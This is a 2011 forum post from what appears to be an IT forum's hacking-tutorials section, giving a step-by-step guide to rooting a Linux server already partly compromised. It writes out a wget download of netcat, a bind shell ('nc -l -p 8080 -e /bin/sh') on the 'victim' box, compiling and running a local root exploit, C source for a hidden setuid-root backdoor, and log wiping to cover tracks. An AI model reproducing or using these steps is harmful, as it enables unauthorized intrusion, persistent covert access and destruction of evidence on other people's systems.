Okara Cantt - Pakistan's Biggest IT Education Forum
Welcome To OkaraCantt - Pakistan's Biggest IT Education Forum. We Hope You Enjoy Your Visit.

You're Currently Viewing Our Forum As A Guest. This Means You Are Limited To Certain Areas Of The Board And There Are Some Features You Can't Use. If You Join Our Community, You'll Be Able To Access Member-Only Sections, And Use Many Member-Only Features Such As Customizing Your Profile, Sending Personal Messages, And Voting In Polls. Registration Is Simple, Fast, And Completely Free.



 
HomeCalendarFAQSearchRegisterLog in

Share | 
 

 **TuT** Server Rooting!!

Go down 
AuthorMessage
Administrator
ADMIN
ADMIN
avatar

Join date : 2011-04-16
Posts : 75
Points : 8919
Reputation : 5010
Gender : Male
Browser :

PostSubject: **TuT** Server Rooting!!   Sat Nov 19, 2011 3:53 am

**Please note: you must have access to a Linux box prior to using this tutorial (this is rooting ONLY).**

First: Download / Obtain Access to the Following:

Required for this Tutorial:

Shell Access - To a Linux Box
Local Root Exploit - Depending on Linux OS and Kernel Version of Box
mig-log cleaner - [You must be registered and logged in to see this link.] and learn how to compile it
Netcat - [You must be registered and logged in to see this link.]
Netcat(unix) - [You must be registered and logged in to see this link.] and learn how to compile it
Patience - Work at it until you get the job done.


Now that you have all that in order lets begin.

Step 1: Reconnaissance

Login to Shell -> Find Out Linux OS and Kernel Versions of Box (ie: Linux 2.6.8) -> Locate a "Local Root Exploit" for Linux Version (can be found using Google/security vulnerability websites) -> Go into a Writable Folder in the Shell


Step 2: Netcat

Find the "Command Execution" area in the Shell -> Enter the following: wget [You must be registered and logged in to see this link.] (unshortened) -> Type chmod +x nc -> Find the "Command Execution" area in the Shell -> Enter the following: ./nc -l -p 8080 -e /bin/sh (example: shell can be /bin/sh or cmd.exe) -> Install Netcat on your PC -> Enter the following: nc VictimIP Port *in our case 8080* -> Then enter: eg 123.123.123.123 8080

This should make an interactive shell, if it didn't, verify whether or not port 8080 was open. However, if you DO have an interactive shell.. this box is ready for rooting. Type the following: nc victimip port


Step 3: Exploiting

Find the Local Root Exploit for this Box -> In the newly spawned shell, type wget [You must be registered and logged in to see this link.] -> If the exploit is not compiled, compile it by typing the following: gcc xpl.c -o xpl;chmod +x xpl -> Now, chmod xpl ->

**Note: The exploit will vary on their usage so make sure you have an understanding of the root exploit you are using.**

You can run your xpl file by entering in: ./xpl

Wait until your exploit is finished running once it is done enter:

whoami

What the whoami command does is tells you who you are if this tells you root then you xpl has done
it's job and you now have root priv's on the box. or you can type:

id

which will give you something like:

uid=0(root) gid=0(root) groups=500(apache) or something similar

And now you can do your happy dance.

Now that we have rooted the box and finished humiliating ourselves by dancing around we want to make
sure that we can come and go as we please without all the hassel of rooting the box over and over. So
we will want to create some kind of backdoor.
we can make this happen with few lines of code:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main( void )
{
setuid( 0 );
system( "/bin/bash" );

return 0;
}

Compile it and change permissions:

root@foobar /root# gcc -o .bkdr main.c
root@foobar /root# chown root:root .bkdr
root@foobar /root# chmod +s .bkdr

Now, all you have to do is put .bkdr somewhere on the system where you can execute it (preferrably
in the $PATH) and if you execute it as another user:

raif@foobar /home/raif$ /usr/local/bin/.bkdr
root@foobar /home/raif# whoami
root

Now you have your access back.

Alright we are almost completed our mission we have successfully rooted our victims box created our backdoor now all we need to do is wipe our tracks that we left in the logs and be on our way. This can be done by using a log cleaner of some kind. For this tutorial we used mig-log cleaner. which you
can get here:
[You must be registered and logged in to see this link.]

Once again we can use our wget command to upload our logcleaner to the rooted box.
[You must be registered and logged in to see this link.]

now just run the logcleaner

./miglc

The mig-log Cleaner has a wide variety of functions which are displayed when you run the log cleaner
so you may choose how exactly you want to clean the logs with the commands given to you. I hope you
enjoyed my tutorial and learned something from it as well. Good luck to you all.
Back to top Go down
http://www.okaracantt.com
 
**TuT** Server Rooting!!
Back to top 
Page 1 of 1
 Similar topics
-
» we are renting with dedicated server co-lo in USA & UK
» VPS with relay server based PC2Phone & mobile dialer at $499
» ..::Dedicated server Rent With Voip Switch::..
» HOW TO RUN SERVER AUTOMATICALLY IN ECLIPSE USING SELENIUM RC
» Selenium RC with Google Chrome on Windows server 2008

Permissions in this forum:You cannot reply to topics in this forum
Okara Cantt - Pakistan's Biggest IT Education Forum  :: Hacks, Exploits, and Various Discussions :: Hacking Tutorials-
Jump to:  

Chat Room OKaraCantt.CoM

Private forum on Forumotion | © phpBB | Free forum support | Contact | Report an abuse | Free forum